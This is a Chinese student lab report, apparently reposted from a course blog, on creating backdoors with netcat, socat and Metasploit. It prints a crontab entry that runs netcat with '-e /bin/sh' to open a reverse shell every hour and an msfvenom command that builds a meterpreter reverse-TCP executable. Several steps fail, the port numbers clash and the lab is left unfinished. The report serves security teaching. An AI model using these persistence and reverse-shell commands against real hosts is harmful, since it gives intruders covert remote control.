一、实践目标与内容
1.学习内容
- 使用nc实现win,mac,Linux间的后门连接
- meterpreter的应用
- MSF POST 模块的应用
2.学习目标
- 学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能。通过亲手实践并了解这一事实,提高自己的安全意识 。
3.概念
- 后门就是不经过正常认证流程而访问系统的通道。
- netcat是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
- socat是ncat的增强版,它使用的格式是socat [options]
- 其中两个address是必选项,而options 是可选项。socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。
二、实践步骤:常用的后门工具的应用
1.Mac获得Linux Shell
1.1查看Mac和linux的ip地址
1.4mac 下获得linux shell,运行指令
2.Linux获得macShell
2.3Linux下看到mac的命令提示
4.使用netct获取主机操作Shell,cron启动
4.1先在mac系统下,监听4324端口
nc -l -p 4324
4.2在Linux环境下,使用man crontab指令查看crontab命令的帮助文档,从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。
4.3用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器
4.4在最后一行添加44 * * * * /bin/netcat 192.168.15.131 4312 -e /bin/sh
,意思是在每个小时的第44分钟反向连接
Mac主机的4306端口,因为当时的时间是17:53,所以设置成44,这样,过一分钟就能看到效果了
4.5获取失败,。。。。。。是由于Mac主机的问题?
5.使用socat获取主机操作Shell, 任务计划启动
6.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
6.1在Linux环境下生成后门程序20154324_backdoor.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.211.130 LPORT=4324 -f exe > 20154324_backdoor.exe
6.2通过nc指令将生成的后门程序传送到MAC主机上
6.3在Linux上使用++msfconsole++指令进入msf控制台,使用监听模块,并设置payload以及反弹回连的IP和端口:
6.4在设置完成后,在Linux环境执行监听
6.5在MAC环境打开后门程序20154324_backdoor.exe,此时可以看到在Linux环境下已经获得了MAC主机的连接,并且得到了远程控制的shell
由于人力不可抗因素,实验被迫中止,谢谢老师
四、心得体会
在这次实践中,我们学习了后门的基本原理及它的运行过程,但是因为电脑本身是Mac os系统,所以存在许多windows的问题无法在Mac上应用,查阅了网上的解决方案也并没有得到解决,但是见识到了后门的厉害,所以一定要认真做实验,学好网络攻防。
原文地址:https://www.cnblogs.com/20154306xxx/p/8672521.html
时间: 2024-11-05 20:32:22